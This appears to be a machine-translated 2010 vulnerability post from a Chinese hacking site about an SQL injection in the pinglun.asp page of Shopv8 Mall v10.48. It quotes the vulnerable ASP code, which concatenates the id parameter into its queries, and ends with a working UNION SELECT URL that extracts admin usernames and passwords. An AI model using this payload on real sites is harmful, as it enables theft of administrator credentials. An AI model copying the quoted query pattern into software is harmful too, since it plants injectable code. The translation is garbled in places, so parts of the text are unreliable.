Shopv8 Mall system v10. 4 8 0day vulnerabilities-vulnerability warning-the black bar safety net

2010-07-19T00:00:00
ID MYHACK58:62201027655
Type myhack58
Reporter 佚名
Modified 2010-07-19T00:00:00

Description

Publishing author: Lan3a Affected versions: Shopv8 Mall system v10. 4 8 Vulnerability description: pinglun. asp page thereSQL injection Author:Lan3a

Reprint please indicate the source: http://blog.cfyhack.cn/

Front Desk All Programs are added to the anti-injection code, so I will not go see.

Directly turn the background of the watch, the first watch did not need to verify, luck is very good, find.

pinglun. asp this file.

The code is as follows:

<%dim the bookid,action pinglunid=request. QueryString("id") submitted directly action=request. QueryString("action") if action="save" then set rs=server. CreateObject("adodb. recordset") rs. open "select * from shop_pinglun where pinglunid="&amp; pinglunid,conn,1,3 rs("huifu")=HTMLEncode2(trim(request("huifu"))) rs("huifudate")=now() rs. update rs. close set rs=nothing response. write "<script language=javascript>alert(’your reply has been successfully submitted it!!!!’); history. go(-1);</script>" response. End end if %> <table class="tableBorder" width="9 0%" border="0" align="center" cellpadding="0" cellspacing="1" bgcolor="#FFFFFF"> <tr> <td align="center" background="../images/admin_bg_1.gif"><b><font color="#ffffff">comment</font></b></td> </tr> <tr> <form name="pinglunform" method="post" action="pinglun. asp? action=save&id=<%=pinglunid%>"> <td > <%set rs=server. CreateObject("adodb. recordset") rs. open "select * from shop_pinglun where pinglunid="&amp; pinglunid,conn,1,3 direct the incoming query %>

The following is directly attached using the method: http://localhost/admin/pinglun.asp?id=1%20and%2201=2%20union%20select%201,2,3,4,username,password,7,8,9,1 0,1 1%20from%20admin